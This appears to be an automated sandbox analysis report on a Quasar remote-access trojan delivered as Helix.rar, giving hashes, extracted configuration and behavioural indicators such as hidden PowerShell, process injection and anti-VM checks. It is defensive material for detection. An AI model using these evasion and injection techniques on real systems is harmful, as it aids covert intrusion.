Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 14:06
Static task
static1
Behavioral task
behavioral1
Sample
Helix.rar
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Helix.rar
Resource
win10v2004-20241007-en
General
-
Target
Helix.rar
-
Size
5.7MB
-
MD5
aa739d62f7cecb119d79c6dd20ce08dc
-
SHA1
c08fc2fa7c60aaccaf63bc36b97718805aa0cf0c
-
SHA256
0dfd21302019e4bfd87c80d5b8c02f2fd04e4468df4d1a2d3e9a79a60d6034f8
-
SHA512
55d055ef27f95cd789b7db207e7d06110960b103f622be46c0852af8fa9b42f4fc442c013ef37facb21116cd084d5f7c11c67ae1fbfdbf2d19579449438d9eab
-
SSDEEP
98304:pqVEctip61GQnWmL7RvzZ/Nf8g9KAywc7ebbPF4LE+cnZLK5lANp1P1NLGXN:pqliAGYf3/Nf99KArcKfPSbcn1dB19G9
Malware Config
Extracted
quasar
-
encryption_key
61554134DA31ADB781F8872F6AA979DB23F475C2
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/2960-2439-0x000002417E7C0000-0x000002417EF44000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 5052 created 2960 5052 WerFault.exe 121 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2676 created 596 2676 powershell.exe 5 PID 3520 created 2676 3520 svchost.exe 94 PID 2960 created 596 2960 powershell.exe 5 PID 3520 created 2960 3520 svchost.exe 121 PID 3520 created 2960 3520 svchost.exe 121 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2676 powershell.exe 2960 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 2532 RqCmrL.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\$nya-B9tKIHPh svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2676 set thread context of 4032 2676 powershell.exe 101 PID 2960 set thread context of 1716 2960 powershell.exe 124 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\RqCmrL.exe powershell.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 28 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000086223e064320148b243d59121825b9b000000000200000000001066000000010000200000007b523f7d64794ba30023bfaf5fbea0d31ea8fb27c48ffb666ef82eb0927a59d4000000000e80000000020000200000003546eb6ad2c036b5d9914e4705b8388c2a85c325ec100806cb2641b889c34966b0030000f509b7f67576aa1252ddd10b486fbf3bacd6946057cb7abdb95715482a737f110ab423bd68e227cc331ed7ba8e19d8aaf1657ea5bdf66a6c9cf05d43ffb0252fdac365d78e0963025e62916a0eb4ddedab56019c7ab5d9598f03e3df121a820eb3a82735f1621d6d99045cdd0c9d6cee31f71a879b4c419d2c88df1cad241d0b233f6a5e1b7b914e144a8c5b443993aa6565db4caa65a2f0c9701332d969befce347687c25c87f51fcbd9e9f7b5c58204020fc614c97759028d3f8381b69ea68d9e59d6777c30920b8f287c0e268df20c995ac79be978a0cf5394d61367bf49cb697d90a4062f6f19637f257d03ebf324c1fdd2058da2f9c83596502c0590ef603595e3bfa6b4039266e9f5bd0c396575c60d4af304b15e7e131bb42b743cd58c05f98683047be9421bd9fe1fa421420a1c79bdf347c188d6a0533d6a23eab1581ddaf6ea256712aea64d4f52d9540dda4f79dba8eeee515f2ae20984315a8d35caae38e19d88dff933b556a44b479b2268daf217683cc99449269dfc59d17acda03888303e81d090cb1fa621b0a3658ae0b9219c3e099f070ab68f71947fd2b79f6d92dd51fb0f16ddd82e3b0ade2c0ae49dfb3f3d879f0872e72f676c25b4aa32cb77b22d662bc7fe01ac52f886c3b3edc4d5c246e0e3ca603a206cbabd173cd4415ff5a25931509caf4531f29679403aa86edf5add8bf7cd21f6a6c634f21f9644474b50c3c218f40ec30e4eeaf6d2153d4d3ccebbcfcf94b1532da1fefc62ccb7e05f9bf6cf12314764492a482dc727f09e40b7e0289d10a3b20567a9befa0a00fabb00897cc52f9f3158078483398dde68b5ae6007484fa313b0ad4e916bf97c7e26efb37753d51af3be01b12e7278588229d8743d9eb413738c82a1c85c463a7daa1e195ce04ee1c3b5530e4a5a90aef09c4110e2a60a6094d642835d94987713fca3e90fdfc45368f762393a3a5691fefce9a684e379cd45d787eeda4fe7f703c5b9817052d5330a6a260172079cdf14a4d529c75c1314c2d7800e9c2ec91e81c461c4847f1fe18370aeabaca15526c5d1dfd734f63e8b6e287f98d4e4c4a3d2856222fbadc8f1e97b7148c909815f8bd3ad00eebb77e52248b5985502eba5189f2790bb3d6dd5e6f46309cdddb96c8b54237472390aa50539bd6c012ed95c15db77b9cc9e6981cfc5db9ead5614ab999ac02eabbcb462db2143dd11195d52b41deebc5579819e52beb131d3e46f85008c341376310d83a262a7552c831ef6d1a8e264c79cb4a447750ed01975b845414430d270d099fa64c3748997756b7002d361c84508724df9e090567764000000075460252e2a797c21b243db47481504c9fc71f9b2124bbeeca18754197edaf6792b8d442b80ba5fb95fccfee7f60dd29cefb47dc22525bcb86312910e12e8af7 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184011DC371010" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184011DC371010 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000086223e064320148b243d59121825b9b00000000020000000000106600000001000020000000258809f569ef1c005db326ab8335ac106b1021826b7daa73a8e1755a922d5264000000000e8000000002000020000000e0f5491a5dbe95657a90ca401b7189a3666e9a8949ca34eb710616f57f49d0d1800000007c9221e45db6dc48766634f276dc99e6c0a931dc3a8c6fa0bffa6ed7b4e68310f3a364b91840ef8cbcf7e9bc552fdfd3dd3076ff377f43f5729e7d9751ad45c06a43e4ffecc99003daa699db6f5acfaab95826fbecdd64726191c3b8d7a49cbdb62e72033d29296b557df7b74fa9a1c071de83e4aac724498ca91adfb92cd6bb40000000285a02c39b4892191aaf371158e540a4fc15dcb5c39997900a08aa77bf230ee1699014fb2ef2c40ce78384ed274d6fb767fec54f937e0d778ae251f069b9c385 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734444492" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 17 Dec 2024 14:08:13 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184011DC371010" mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe 4032 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2856 7zFM.exe 3512 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2856 7zFM.exe Token: 35 2856 7zFM.exe Token: SeSecurityPrivilege 2856 7zFM.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeSecurityPrivilege 2856 7zFM.exe Token: SeDebugPrivilege 4032 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1120 svchost.exe Token: SeIncreaseQuotaPrivilege 1120 svchost.exe Token: SeSecurityPrivilege 1120 svchost.exe Token: SeTakeOwnershipPrivilege 1120 svchost.exe Token: SeLoadDriverPrivilege 1120 svchost.exe Token: SeSystemtimePrivilege 1120 svchost.exe Token: SeBackupPrivilege 1120 svchost.exe Token: SeRestorePrivilege 1120 svchost.exe Token: SeShutdownPrivilege 1120 svchost.exe Token: SeSystemEnvironmentPrivilege 1120 svchost.exe Token: SeUndockPrivilege 1120 svchost.exe Token: SeManageVolumePrivilege 1120 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1120 svchost.exe Token: SeIncreaseQuotaPrivilege 1120 svchost.exe Token: SeSecurityPrivilege 1120 svchost.exe Token: SeTakeOwnershipPrivilege 1120 svchost.exe Token: SeLoadDriverPrivilege 1120 svchost.exe Token: SeSystemtimePrivilege 1120 svchost.exe Token: SeBackupPrivilege 1120 svchost.exe Token: SeRestorePrivilege 1120 svchost.exe Token: SeShutdownPrivilege 1120 svchost.exe Token: SeSystemEnvironmentPrivilege 1120 svchost.exe Token: SeUndockPrivilege 1120 svchost.exe Token: SeManageVolumePrivilege 1120 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1120 svchost.exe Token: SeIncreaseQuotaPrivilege 1120 svchost.exe Token: SeSecurityPrivilege 1120 svchost.exe Token: SeTakeOwnershipPrivilege 1120 svchost.exe Token: SeLoadDriverPrivilege 1120 svchost.exe Token: SeSystemtimePrivilege 1120 svchost.exe Token: SeBackupPrivilege 1120 svchost.exe Token: SeRestorePrivilege 1120 svchost.exe Token: SeShutdownPrivilege 1120 svchost.exe Token: SeSystemEnvironmentPrivilege 1120 svchost.exe Token: SeUndockPrivilege 1120 svchost.exe Token: SeManageVolumePrivilege 1120 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1120 svchost.exe Token: SeIncreaseQuotaPrivilege 1120 svchost.exe Token: SeSecurityPrivilege 1120 svchost.exe Token: SeTakeOwnershipPrivilege 1120 svchost.exe Token: SeLoadDriverPrivilege 1120 svchost.exe Token: SeSystemtimePrivilege 1120 svchost.exe Token: SeBackupPrivilege 1120 svchost.exe Token: SeRestorePrivilege 1120 svchost.exe Token: SeShutdownPrivilege 1120 svchost.exe Token: SeSystemEnvironmentPrivilege 1120 svchost.exe Token: SeUndockPrivilege 1120 svchost.exe Token: SeManageVolumePrivilege 1120 svchost.exe Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 4800 svchost.exe Token: SeCreatePagefilePrivilege 4800 svchost.exe Token: SeShutdownPrivilege 3720 mousocoreworker.exe Token: SeCreatePagefilePrivilege 3720 mousocoreworker.exe Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2856 7zFM.exe 2856 7zFM.exe 2856 7zFM.exe 3512 Explorer.EXE 3512 Explorer.EXE 3512 Explorer.EXE 3512 Explorer.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 3512 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2960 powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3536 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2856 wrote to memory of 2156 2856 7zFM.exe 85 PID 2856 wrote to memory of 2156 2856 7zFM.exe 85 PID 2156 wrote to memory of 1952 2156 cmd.exe 89 PID 2156 wrote to memory of 1952 2156 cmd.exe 89 PID 2156 wrote to memory of 2408 2156 cmd.exe 90 PID 2156 wrote to memory of 2408 2156 cmd.exe 90 PID 2156 wrote to memory of 3488 2156 cmd.exe 91 PID 2156 wrote to memory of 3488 2156 cmd.exe 91 PID 2156 wrote to memory of 3520 2156 cmd.exe 92 PID 2156 wrote to memory of 3520 2156 cmd.exe 92 PID 2156 wrote to memory of 2968 2156 cmd.exe 93 PID 2156 wrote to memory of 2968 2156 cmd.exe 93 PID 2156 wrote to memory of 2676 2156 cmd.exe 94 PID 2156 wrote to memory of 2676 2156 cmd.exe 94 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 2676 wrote to memory of 4032 2676 powershell.exe 101 PID 4032 wrote to memory of 596 4032 dllhost.exe 5 PID 4032 wrote to memory of 668 4032 dllhost.exe 7 PID 4032 wrote to memory of 944 4032 dllhost.exe 12 PID 4032 wrote to memory of 1012 4032 dllhost.exe 13 PID 4032 wrote to memory of 528 4032 dllhost.exe 14 PID 4032 wrote to memory of 620 4032 dllhost.exe 16 PID 4032 wrote to memory of 1068 4032 dllhost.exe 17 PID 4032 wrote to memory of 1080 4032 dllhost.exe 18 PID 4032 wrote to memory of 1188 4032 dllhost.exe 19 PID 4032 wrote to memory of 1220 4032 dllhost.exe 20 PID 4032 wrote to memory of 1264 4032 dllhost.exe 21 PID 4032 wrote to memory of 1304 4032 dllhost.exe 22 PID 4032 wrote to memory of 1352 4032 dllhost.exe 23 PID 4032 wrote to memory of 1380 4032 dllhost.exe 24 PID 4032 wrote to memory of 1472 4032 dllhost.exe 25 PID 4032 wrote to memory of 1496 4032 dllhost.exe 26 PID 4032 wrote to memory of 1556 4032 dllhost.exe 27 PID 4032 wrote to memory of 1628 4032 dllhost.exe 28 PID 4032 wrote to memory of 1680 4032 dllhost.exe 29 PID 4032 wrote to memory of 1732 4032 dllhost.exe 30 PID 4032 wrote to memory of 1768 4032 dllhost.exe 31 PID 4032 wrote to memory of 1816 4032 dllhost.exe 32 PID 4032 wrote to memory of 2016 4032 dllhost.exe 33 PID 4032 wrote to memory of 2012 4032 dllhost.exe 34 PID 4032 wrote to memory of 1120 4032 dllhost.exe 35 PID 4032 wrote to memory of 1324 4032 dllhost.exe 36 PID 4032 wrote to memory of 1440 4032 dllhost.exe 37 PID 4032 wrote to memory of 2116 4032 dllhost.exe 38 PID 4032 wrote to memory of 2188 4032 dllhost.exe 40 PID 4032 wrote to memory of 2336 4032 dllhost.exe 41 PID 4032 wrote to memory of 2496 4032 dllhost.exe 42 PID 4032 wrote to memory of 2504 4032 dllhost.exe 43 PID 668 wrote to memory of 2792 668 lsass.exe 47 PID 4032 wrote to memory of 2648 4032 dllhost.exe 44 PID 4032 wrote to memory of 2660 4032 dllhost.exe 45 PID 4032 wrote to memory of 2748 4032 dllhost.exe 46 PID 4032 wrote to memory of 2792 4032 dllhost.exe 47 PID 4032 wrote to memory of 2804 4032 dllhost.exe 48 PID 668 wrote to memory of 2792 668 lsass.exe 47 PID 4032 wrote to memory of 2812 4032 dllhost.exe 49 PID 4032 wrote to memory of 2820 4032 dllhost.exe 50 PID 4032 wrote to memory of 2840 4032 